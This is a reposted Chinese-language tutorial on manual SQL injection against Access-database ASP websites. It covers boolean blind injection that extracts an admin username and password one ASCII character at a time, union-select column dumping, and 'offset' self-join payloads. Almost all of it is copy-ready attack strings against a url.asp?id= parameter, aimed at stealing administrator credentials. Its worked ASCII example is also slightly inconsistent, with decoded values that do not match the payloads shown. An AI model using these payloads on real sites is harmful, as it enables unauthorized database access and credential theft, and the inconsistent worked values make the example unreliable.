access手工注入
【SQL】access手工注入
1)判断注入
‘ 出现错误 –可能存在注入漏洞
and 1=1 返回正确
and 1=2 返回错误 –说明存在注入漏洞
2)判断数据库
and (select count(*) from msysobjects)>0 –返回权限不足为access数据库
and (select count(*) from sysobjects)>0 –返回正常则为MSSQL数据库
3)猜表名列名
and exists (select * from 表名) –猜测表名
and exists (select 列名 from 表名) –猜测列名
如:
判断是否存在admin的表:and exists (select * from admin)
判断是否存在username的列:and exists (select username from admin)
判断是否存在password的列:and exists (select password from admin)
4)猜解用户名和密码长度
and (select top 1 len(列名) from 表名)=X –X代表数字,返回正确代表所猜的列名长度为这个数字
如:
判断用户名的长度是否大于零:and (select top 1 len(username) from admin)>0
判断用户名的长度是否大于四:and (select top 1 len(username) from admin)>4
判断用户名的长度是否大于五:and (select top 1 len(username) from admin)>5
–用户名一般都是admin,大于四返回正确,当大于五返回出错,那么他的长度就是5,密码一般是MD5加密的,所以一般都为16或32位。
5)猜解用户和密码的ascii码
–这里应该采用截半法来提高效率。ascii码0-126。
这里我们假设用户为:admin 密码为:admin888,猜出来的ascii码用转换工具转换下就可以的出明
文
and(select top 1 asc(mid(username,1,1))from admin)>97
and(select top 1 asc(mid(username,1,1))from admin)=97
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110
97 100 109 105 110 admin
———————————————————–
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32
52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32
469e80d32c0559f8 md5 解出来的密码是admin888
===================分割线===================
至此,用户密码都出来,万恶的手工结束。
不过是不是有点繁琐,除了工具,还有方便的联合查询方法,继续:
1)联合查询:
order by X –猜字段(X代表数字,返回错误代表数字大,直至反正正确代表有多少字段。)
union select 1,2,3,4,5,6….from 表名 有多少字段,数字就写到多少,爆字段位置
union select 1,列名,3,4,5,6 from 表名 爆列名所含的内容,位置在哪里就写在哪里
如:
order by 15 错误
order by 16 正确 –说明有16个字段
假如表为:admin 列名有:username,password 。
构造的语句为:
http:url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
在爆出的字段位置填入列名,这里假如为6,8。
构造的语句为:
http:url.asp?id=1 union select 1,2,3,4,5,username,7,password,9,10,11,12,13,14,15,16 from admin
===================分割线===================
至此,用户密码同样爆出来了,是不是简单了。
有时候联合查询爆出字段位置,死活猜不到列名,各种神器都砸不出来时,这里就要用到偏移注射,
顺便说下:
说明下,注入表的字段数要大于或等于目标列的两倍。
1)首先要构造这样子的语句:select * from (admin as a inner join admin as b on a.id=b.id)
几点说明:
–*代表的字段,如果拓宽会加大username password在可显示位置的几率
–(admin as a inner join admin as b on a.id=b.id)是admin表自连接
–id为列,当id列改变则随之改变
–整句的意思是:admin表记为a,同时也记为b,然后查询条件是a表的id列与b表的id列相等,返回
所有相等的行,显然,a,b都是同一个表,当然全部返回啦。
还是举例说明好:
http://url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
假如有五个表列,则
http://url.asp?id=1 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.id=b.id)
人品不好还是没爆出来,则
http://url.asp?id=1 union select 1,2,3,4,5,6,a.id,* from (admin as a inner join admin as b on a.id=b.id)
http://url.asp?id=1 union select 1,2,3,4,5,6,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
这时*里的字段排列顺序却被打乱,增加页面显示几率。
如果还没爆出来,则
http://url.asp?id=1 union select 1,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
http://url.asp?id=1 union select 1,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
【注】本文转自:http://sh4dow.lofter.com/post/395c80_1214862
